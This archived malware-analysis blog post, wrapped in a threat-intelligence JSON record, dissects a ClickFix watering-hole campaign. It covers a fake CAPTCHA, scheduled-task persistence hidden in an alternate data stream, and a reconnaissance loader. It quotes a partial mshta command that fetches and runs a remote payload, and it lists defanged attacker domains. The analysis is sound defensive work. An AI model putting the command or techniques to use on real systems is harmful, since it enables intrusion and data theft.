{
	"id": "1e2db06f-1cb7-4348-9c68-cccbde387845",
	"created_at": "2026-05-05T02:46:08.277757Z",
	"updated_at": "2026-05-05T02:46:37.118478Z",
	"deleted_at": null,
	"sha1_hash": "433713025f7e2cab3a3a72a0a4624064f9873bf9",
	"title": "Dissecting the ClickFix User-Execution Attack and Its Sophisticated Persistence via ADS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10513268,
	"plain_text": "Dissecting the ClickFix User-Execution Attack and Its\r\nSophisticated Persistence via ADS\r\nBy Ireneusz Tarnowski\r\nPublished: 2025-07-17 · Archived: 2026-05-05 02:29:10 UTC\r\n14 min read\r\nJul 16, 2025\r\nPress enter or click to view image in full size\r\nThe following analysis presents how an adversary tackled the challenge of malware delivery using a set of\r\ntechniques that stand out due to their specificity and operational precision. The post is not intended to\r\ncomprehensively describe the entire campaign or its variants, but instead zooms in on two core components: the\r\nuse of the ClickFix mechanism and a targeted downloader tailored for controlled execution.\r\nAttribution and infrastructure profiling have been deliberately excluded to maintain focus on the TTPs directly\r\nobservable within the analyzed payload and initial access phase.\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 1 of 19\n\nThis analysis is intended as a technical aid for defenders, threat hunters, and detection engineers — to deepen\r\nunderstanding of the adversary’s tooling and improve the visibility of similar threat activity across enterprise\r\nenvironments.\r\nAt the time of this report’s publication, all three websites that had been injected with malicious code had been\r\nremediated and no longer pose a threat to their visitors.\r\nThe Rise of ClickFix: Malicious Copy-and-Paste as an Initial Access Vector\r\nAt the end of 2024, a novel attack technique emerged in the threat landscape, eventually gaining wider recognition\r\non March 18, 2025, when it was officially added to the MITRE ATT\u0026CK framework as technique T1204.004 —\r\nUser Execution: Malicious Copy and Paste, colloquially referred to as ClickFix.\r\nInitially, this method was primarily leveraged by less sophisticated threat actors operating under the Crime-as-a-Service (CaaS) model. However, as its effectiveness became evident, ClickFix quickly evolved into a viable\r\nmethod for initial access, even in more advanced campaigns. It is now observed as a component in attacks\r\nconducted by well-resourced and organized threat groups executing complex intrusion chains.\r\nWhat makes this technique particularly impactful is the strategic shift in responsibility it creates: the attacker\r\npushes the execution burden onto the user. By doing so, they can effectively bypass traditional controls designed\r\nto detect and block phishing or spear-phishing attempts. This subtle yet powerful change in the initial access\r\nstrategy has significantly lowered the barrier for successful compromise.\r\nObserved Campaign: Watering Hole with ClickFix Delivery\r\nIn recent days, a new attack pattern leveraging the ClickFix technique was observed. The initial access phase\r\nbegan with a watering hole attack, in which legitimate websites related to a specific thematic area were\r\ncompromised and used to deliver malicious content.\r\nThe attack chain was initiated through the injection of malicious code directly into compromised websites.\r\nAlthough the exact method used to gain access and deploy the payload remains unknown, the technical\r\ncharacteristics of the affected sites suggest a relatively low level of complexity — particularly in the context of\r\noutdated CMS frameworks or legacy web applications lacking proper maintenance and regular updates.\r\nThis stage effectively positioned the adversary to deliver further malicious content via trusted, familiar domains,\r\ndramatically increasing the likelihood of user interaction.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 2 of 19\n\nFigure 1: Example of the first compromised website observed with injected malicious code.\r\nPress enter or click to view image in full size\r\nFigure 2: Example of the second compromised website observed with injected malicious code.\r\nInjected Payload Characteristics\r\nBoth compromised websites contained identical malicious JavaScript code (see Figure 3). Although the injected\r\nscript was the same, its placement within the HTML structure differed slightly between pages, suggesting that the\r\nmodification was likely performed manually rather than through an automated deployment process.\r\nThe embedded code was heavily obfuscated, clearly intended to hinder static analysis and avoid straightforward\r\ndetection. This script serves as the entry point for the subsequent stages of the attack and is the starting focus of\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 3 of 19\n\nour deeper technical analysis.\r\nPress enter or click to view image in full size\r\nFigure 3: HTML source code of the compromised page containing the injected JavaScript snippet.\r\nDeobfuscation of the Injected Script\r\nThe JavaScript code extracted from the compromised webpage was subjected to a deobfuscation process to\r\nimprove readability and allow for a clearer understanding of its execution logic. This step was essential to identify\r\nthe purpose of the script, uncover its control flow, and determine how it initiates the next stage of the attack. The\r\ndeobfuscated version, shown in Figure 4, reveals the structure and behavior that were intentionally concealed by\r\nthe obfuscation layer.\r\nPress enter or click to view image in full size\r\nFigure 4: Deobfuscated portion of the JavaScript payload injected into the compromised website\r\nBehavior of the Deobfuscated JavaScript Payload\r\nAfter the page fully loads and the DOMContentLoaded event is triggered, the deobfuscated JavaScript code begins\r\nits execution. Its primary objective is to render a fullscreen iframe that loads an external webpage hosted at\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 4 of 19\n\nhttps://1000lifelessons[.]shop/... . This page is designed to visually mimic a CAPTCHA challenge, aiming\r\nto gain the user’s trust and encourage interaction.\r\nThe script starts by checking if the sessionStorage object contains a key named reCAPTCHAv3 . If this key is\r\npresent, it assumes the script has already run during the current session and halts further execution. If the key is\r\nnot found, the script then verifies whether the browser is running on a Windows operating system by inspecting\r\nthe userAgent string.\r\nNext, the code checks the value of the same key, reCAPTCHAv3 , within localStorage . If the value exceeds 3,\r\nthe script refrains from displaying the iframe. Otherwise, it proceeds to inject the iframe into the DOM. The\r\ninjected iframe is styled to cover the entire screen and is positioned above all other elements using a very high z-index , ensuring it remains visually dominant.\r\nOnce the iframe is added, the script updates the state to control its future behavior. It sets the reCAPTCHAv3 key in\r\nsessionStorage to 0 , effectively preventing the iframe from being shown again in the same session.\r\nSimultaneously, it increments the corresponding value in localStorage by one, limiting the number of injection\r\nattempts across sessions.\r\nFinally, an event listener is registered to handle message events. If the script receives a message with the content\r\n\"closeReCAPTCHA\" , it interprets this as a signal to remove the iframe from the page - simulating the expected\r\nbehavior of a completed CAPTCHA interaction.\r\nThe atob() function in JavaScript is used to decode data encoded in Base64 format. The name stands for\r\n“ASCII to binary.” It takes a Base64-encoded string as input and returns a decoded string in ASCII. This function\r\nis often used to decode obfuscated or encoded payloads embedded in scripts, especially in the context of malicious\r\nJavaScript, where data is intentionally hidden from casual inspection.\r\nPress enter or click to view image in full size\r\nFigure 5: Decoded string from the payload revealing the actual source URL of the iframe.\r\nThe next step involves retrieving and analyzing the page referenced as the source of the injected iframe —\r\ny6ywH-bTaUOtFHqcS8HqGA2.htm .\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 5 of 19\n\nFigure 6a: Appearance of the webpage serving as the iframe source.\r\nPress enter or click to view image in full size\r\nFigure 6b: Source code of the iframe page highlighting the relevant JavaScript function.\r\nWe extract the JavaScript function and subject it to deobfuscation.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 6 of 19\n\nFigure 7: Deobfuscated JavaScript function extracted from the iframe source code.\r\nThe iframe described here is designed to simulate a CAPTCHA challenge, consistent with the behavior observed\r\nin the ClickFix technique. It verifies certain conditions, displays graphical images (which are embedded as\r\nBase64-encoded strings directly within the page’s source code), blurs the background - i.e., the actual webpage\r\nbehind the iframe - and presents the user with instructions on how to proceed (as shown in Figure 1). Additionally,\r\nas illustrated in Figure 8, it prepares clipboard content for subsequent malicious actions.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 7 of 19\n\nFigure 8: Key code snippet showing the content being copied to the clipboard.\r\nThis fragment was decoded using CyberChef.\r\nPress enter or click to view image in full size\r\nFigure 9: Decoded content that is copied to the clipboard.\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 8 of 19\n\nIn this attack, the user is persuaded to execute the code by pasting it from the clipboard into the Run dialog\r\n(accessed via the Win+R shortcut).\r\nmshta \"javascript:eval(decodeURIComponent('new ActiveXObject(\"Shell.Application\").ShellExecute(\"mshta\r\nThis code uses mshta.exe to execute a JavaScript snippet that creates a new ActiveXObject\r\n( Shell.Application ) to launch a separate mshta.exe process. This second process opens the URL\r\nhttps://1000lifelessons.shop/track_v1.dhtml using the default system handler. After initiating this, the script\r\ncloses the original mshta window. Essentially, it leverages mshta.exe to silently load and execute a remote\r\nHTML/JavaScript payload hosted on the attacker’s server.\r\nEnd of the ClickFix Stage\r\nAt this point, the main part of the ClickFix-based attack concludes. The user, having landed on the compromised\r\nwebsite — either via a link received through email or through SEO poisoning — has unknowingly followed the\r\nfull chain: visiting the site, receiving a malicious payload, and executing it manually.\r\nWhat makes this case particularly noteworthy is that the payload being delivered and executed is an HTML file,\r\nwhich is relatively rare. In most similar scenarios, attackers typically drop a compiled executable and rely on\r\nPowerShell (often heavily obfuscated) to facilitate execution and further stages of the attack.\r\nIn contrast, this campaign leverages the full JavaScript-based ClickFix chain to deliver and execute a malicious\r\nHTML payload, bypassing traditional executable delivery methods. While uncommon, this approach aligns with\r\nthe known TTPs of the threat actor responsible, showing a preference for browser-native mechanisms and user-driven execution.\r\nStage Two: Download and Execution of Droper Component\r\nThe second phase of the attack begins with the execution of the .dhtml file—triggered by the user action\r\ninitiated via the ClickFix technique. In reality, the downloaded HTML file [track_v1.dhtml] contains a JavaScript\r\npayload (Figure 10) which, like the earlier scripts, is obfuscated. Upon analysis, this script reveals several\r\ninteresting techniques that the attacker chose to employ at this stage of the intrusion chain.\r\nPress enter or click to view image in full size\r\nFigure 10: Retrieved and executed .dhtml file.\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 9 of 19\n\nThis script (Figure 11), executed via Windows Script Host (WSH) using mshta.exe , constitutes the second stage\r\nof the attack. Its purpose is to establish persistence on the system and prepare a concealed mechanism for\r\nrepeatedly executing malicious code. Two key techniques are employed here: Windows Scheduled Tasks and\r\nAlternate Data Streams (ADS) — both widely known in Windows environments as reliable methods for stealthy,\r\nlong-term presence.\r\nGet Ireneusz Tarnowski’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThe script begins by resolving the path to the user’s temporary directory using GetSpecialFolder(2) and then\r\nnavigates one level up in the directory hierarchy (Figure 11, part 1). Within this parent directory, it creates a folder\r\nnamed Evernotte , a name that closely resembles the legitimate Evernote application—clearly intended to reduce\r\nsuspicion during manual inspection. Into this directory, the script copies wscript.exe from the Windows system\r\nfolder and renames it to Evernote.exe , preserving the file’s functionality while disguising its malicious role\r\n(Figure 11, part 2).\r\nNext, the script leverages the COM interface Schedule.Service to register a scheduled task (Figure 11, part 3).\r\nThe task is misleadingly named MicrosoftEdgeUpdateTaskMachineCore , mimicking a legitimate Windows\r\nmaintenance task. Its description is carefully crafted to resemble that of a standard Microsoft update process,\r\nwarning that disabling the task could lead to vulnerabilities—further discouraging user interference.\r\nThe task is configured to execute the renamed Evernote.exe with specific arguments pointing to an Alternate\r\nData Stream (ADS) named Zone.Identifier (Figure 11, part 4). This hidden stream is created and written to by\r\nthe script, and is expected to contain malicious JavaScript. The use of an ADS allows the attacker to hide the\r\npayload within the file system in a way that does not appear in standard directory listings or file explorers.\r\nFinally, the task is scheduled to run every 20 minutes for up to 24 hours per day, starting from a fixed (and\r\ninnocuous-looking) date in the past. This repetition ensures that the malicious payload is executed regularly and\r\nreliably, providing the attacker with sustained access and control. The combination of scheduled execution, a\r\nmisleading task name, and data hidden in an ADS makes this approach particularly stealthy and resilient.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 10 of 19\n\nFigure 11: Malicious script with key persistence (3) and ADS-related elements highlighted (4).\r\nThe script described above functions as a dropper, establishing persistence for a file deployed into the system.\r\nIn the next step, the script that was dropped and stored as an Alternate Data Stream (ADS) under\r\nEvernote.exe:Zone.Identifier . In addition to the typical obfuscation techniques observed throughout this\r\nattack, this particular payload introduces two distinct obfuscation layers: URL decoding and hexadecimal\r\nencoding. These layers are stacked to further obscure the script’s actual behavior and hinder both manual\r\ninspection and automated detection.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 11 of 19\n\nFigure 12: Payload decoded down to the hexadecimal-encoded layer.\r\nAfter decoding the final layer and performing deobfuscation, the last script used in the attack - responsible for the\r\nactual malicious functionality — was obtained. This script represents the final payload in the chain and executes\r\nthe core logic intended by the attacker.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 12 of 19\n\nFigure 13: Deobfuscated version of the final malicious script.\r\nThe final malicious script, executed from the Zone.Identifier alternate data stream attached to Evernote.exe ,\r\nfunctions as a reconnaissance module and dynamic loader. It begins by checking whether any command-line\r\narguments are provided. If none are detected, the script exits immediately. This may serve as a simple anti-analysis mechanism or a form of execution control.\r\nNext, the script initiates an HTTP POST request to the command-and-control server (Figure 14, part 1) at\r\nhxxps://1000lifelessons[.]shop/carhartt-8-pocket-knit-waistband-cargo-jogger.html . Before sending\r\ndata, it performs extensive system enumeration using Windows Management Instrumentation (WMI). The script\r\ncollects the current username, computer name, operating system name and version, and the system's last boot-up\r\ntime. It also enumerates all currently running processes, gathering their names and process IDs (Figure 14, part\r\n2,3).\r\nThese data points are then aggregated into a single string, which is reversed character-by-character and URL-encoded — a basic, yet effective, method of obfuscating telemetry before transmission (Figure 14, part 4). The\r\nencoded data are then sent to the C2 server, likely serving both as a passive fingerprinting operation and a filtering\r\nmechanism to determine whether the environment is suitable for deploying the next payload.\r\nFollowing this, the script evaluates the execution context by counting the number of files in its own directory. If\r\nmore than one file is found, it exits immediately — an evasive behavior potentially aimed at avoiding analysis in\r\nsandbox environments, where multiple monitoring files may be present.\r\nIf no exit condition is triggered, the script proceeds to perform a GET request to another URL:\r\nhxxps://1000lifelessons[.]shop/tFwrrC9p/captcha/captcha.js . It sets a spoofed User-Agent string to mimic a\r\nlegitimate Chrome browser on Windows 10. If the server responds with a payload larger than 300,000 characters,\r\nthe response is URL-decoded and passed to eval() for execution—indicating a dynamic second-stage loader\r\ncapable of retrieving and executing arbitrary JavaScript code on the fly (Figure 14, part 6).\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 13 of 19\n\nFigure 14: Key excerpts from the final loader file.\r\nConclusions\r\nThe ClickFix attack exemplifies a sophisticated and evolving intrusion method that relies on a combination of\r\ntechnical stealth and social engineering. At its core is a tactic that has become increasingly common among threat\r\nactors — compromising legitimate websites to serve as watering holes. By injecting malicious JavaScript into\r\ntrusted sites, attackers can passively lure victims without the need for overt phishing emails or malicious\r\ndownloads. This approach leverages user trust and topical relevance to increase the likelihood of user engagement\r\nand successful payload delivery.\r\nThe ClickFix technique specifically shifts the burden of execution to the user through clipboard hijacking and\r\nvisual deception. This method bypasses many traditional security controls by exploiting user behavior rather than\r\nrelying on software vulnerabilities. As a result, the initial stage of the attack often goes unnoticed by conventional\r\ndetection systems, especially in environments that rely solely on automated threat prevention.\r\nThroughout the attack chain, the adversary demonstrates a high level of operational maturity. The use of\r\nobfuscated JavaScript, multi-stage payloads, and Alternate Data Streams (ADS) for stealthy file delivery indicates\r\na deliberate effort to evade detection and resist forensic analysis. The attacker also adapts their infrastructure\r\ndynamically, as observed in the July 16, 2025 variant — where changes were made to domain names, file paths,\r\nand even scheduled task identifiers to better blend into the victim environment.\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 14 of 19\n\nOne of the most critical aspects of this attack is the presence of a conditional final-stage loader, observed at the\r\nend of the infection chain. This loader gathers detailed telemetry from the victim’s machine — including OS\r\nversion, username, hostname, system uptime, and a full list of running processes — and sends it back to the\r\nattacker’s server. Only if the collected data matches the threat actor’s targeting criteria does the loader fetch and\r\nexecute a final payload. This selective execution mechanism strongly suggests a targeted campaign, where only\r\nsystems of interest are subject to full compromise. Such behavior is typical of APT-style operations or campaigns\r\nfocused on high-value victims.\r\nIn conclusion, ClickFix is more than an isolated technique; it represents a modular and extensible framework for\r\ngaining initial access through user deception, and for selectively escalating access based on reconnaissance. The\r\nblending of social engineering, compromised infrastructure, and stealthy persistence mechanisms makes this\r\nattack highly effective and difficult to detect. Defenders must look beyond signatures and static indicators, and\r\nfocus on behavioral detection strategies — particularly those involving unusual use of scripting engines (e.g.,\r\nmshta.exe ), clipboard operations, scheduled tasks, and system reconnaissance activity.\r\nUpdate\r\nOn July 16, 2025, I observed another website containing injected code that followed the same attack chain as\r\npreviously analyzed. The entire flow of execution, from the malicious JavaScript injection to user interaction and\r\npayload delivery, remained consistent. However, there were two notable differences: the domain used to host the\r\nmalicious payloads had changed, and the attacker modified the persistence mechanism by changing the folder and\r\nfile names.\r\nIn this variant, the attacker created a folder and executable that impersonated AutoCAD software. Specifically, a\r\nnew folder named AutoDisk was created, and within it, a file named acad.exe was placed. As in the previous\r\nattack, wscript.exe from the system directory was copied to this location. The malicious script also registered a\r\nscheduled task with a seemingly legitimate description: “Runs batch plotting for drawing files nightly.” This\r\ndescription is meant to blend in with legitimate AutoCAD-related tasks and avoid detection.\r\nAnother key change was in the configuration of the final-stage loader. The hardcoded User-Agent used in the\r\nHTTP request was updated, further helping the traffic blend in with typical browser behavior. Additionally, the\r\nsize threshold used to validate the downloaded remote JavaScript payload was reduced — from 300,000\r\ncharacters in the initial attack to 200,000 in this iteration — possibly as an evasion tactic or an adjustment based\r\non payload size optimization.\r\nDetails of the July 16 incident are provided below.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 15 of 19\n\nFigure 15a: ClickFix screen from the July 16, 2025 attack.\r\nPress enter or click to view image in full size\r\nFigure 15b: Code snippet embedding the iframe — new domain visible.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 16 of 19\n\nFigure 15c: Code fragment implementing the persistence mechanism — new file and scheduled task\r\nnames visible.\r\nPress enter or click to view image in full size\r\nFigure 15d: Final fragment — conditional loader with visible domain changes.\r\nPress enter or click to view image in full size\r\nFigure 15e: Final fragment — conditional loader with visible domain changes.\r\nTTP\r\nT1189 Initial Access: Drive-by Compromise\r\nAttackers infect legitimate websites by injecting malicious JavaScript.\r\nT1059.005 Execution: Command and Scripting Interpreter\r\nUsing mshta.exe to run malicious JScript/VBScript scripts.\r\nT1204.004 Execution: User Execution\r\nThe user is tricked into manually executing code using the Malicious Copy and Paste technique (ClickFix).\r\nhttps://attack.mitre.org/techniques/T1204/004/\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 17 of 19\n\nT1053.005 Persistence: Scheduled Task\r\nCreating scheduled tasks with names mimicking legitimate system processes (e.g.,\r\nMicrosoftEdgeUpdateTaskMachineCore).\r\nT1564.004 Persistence: Alternate Data Streams (ADS)\r\nHiding scripts within alternate data streams of files (e.g., Evernote.exe:Zone.Identifier).\r\nT1027 Defense Evasion: Obfuscated Files or Information\r\nMulti-layered JavaScript obfuscation (URL decoding, hexadecimal encoding).\r\nT1036.003 Defense Evasion: Masquerading: Rename Legitimate Utilities\r\nHiding files under names resembling legitimate software (e.g., folder Evernotte, file Evernote.exe).\r\nT1082 Discovery: System Information Discovery\r\nCollecting information about the operating system, username, and computer name.\r\nT1057 Discovery: System Process Discovery\r\nRetrieving a list of running processes with their process IDs.\r\nT1071 Command and Control: Application Layer Protocol\r\nCommunicating with the C2 server via HTTP(S), sending system telemetry data.\r\nT1129 Execution: Dynamic Code Loading\r\nDownloading and executing remote JavaScript scripts (e.g., captcha.js from the C2 server).\r\nIoC\r\nAttack 1\r\nhxxps://1000lifelessons[.]shop/\r\nmain domain used for hosting payloads\r\nhxxps://1000lifelessons[.]shop/v1/Track/y6ywH-bTaUOtFHqcS8HqGA2.htm\r\niframe source page\r\nhxxps://1000lifelessons[.]shop/track_v1.dhtml\r\n2stage payload\r\nhxxps://1000lifelessons[.]shop/carhartt-8-pocket-knit-waistband-cargo-jogger.html\r\nendpoint receiving system telemetry data\r\nhxxps://1000lifelessons[.]shop/tFwrrC9p/captcha/captcha.js\r\ndynamically downloaded remote JavaScript payload\r\nMozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.50 Safari/537.3\r\nUser-Agent\r\nAttack 2\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 18 of 19\n\nhxxps://channelnewsasia[.]icu/\r\nmain domain used for hosting payloads\r\nhxxps://channelnewsasia[.]icu//_Incapsula_Resource_v1.htm\r\niframe source simulating CAPTCHA\r\nhxxps://channelnewsasia[.]icu/get/css.esca.dhtml\r\n2stage payload\r\nhxxps://channelnewsasia[.]icu/vnmake-Thane-it-sloppily-Macd-With-my-It-welliou.html\r\nendpoint receiving system telemetry data\r\nhxxps://channelnewsasia[.]icu/omsdk/releases/live/omweb-v1.js\r\ndynamically downloaded remote JavaScript payload\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102\r\nUser-Agent\r\nAnalysis date: July 15-16, 2025\r\nSource: https://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-5443\r\n5da7176b\r\nhttps://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@ireneusz.tarnowski/dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b"
	],
	"report_names": [
		"dissecting-the-clickfix-user-execution-attack-and-its-sophisticated-persistence-via-ads-54435da7176b"
	],
	"threat_actors": [],
	"ts_created_at": 1777949168,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/433713025f7e2cab3a3a72a0a4624064f9873bf9.pdf",
		"text": "https://archive.orkl.eu/433713025f7e2cab3a3a72a0a4624064f9873bf9.txt",
		"img": "https://archive.orkl.eu/433713025f7e2cab3a3a72a0a4624064f9873bf9.jpg"
	}
}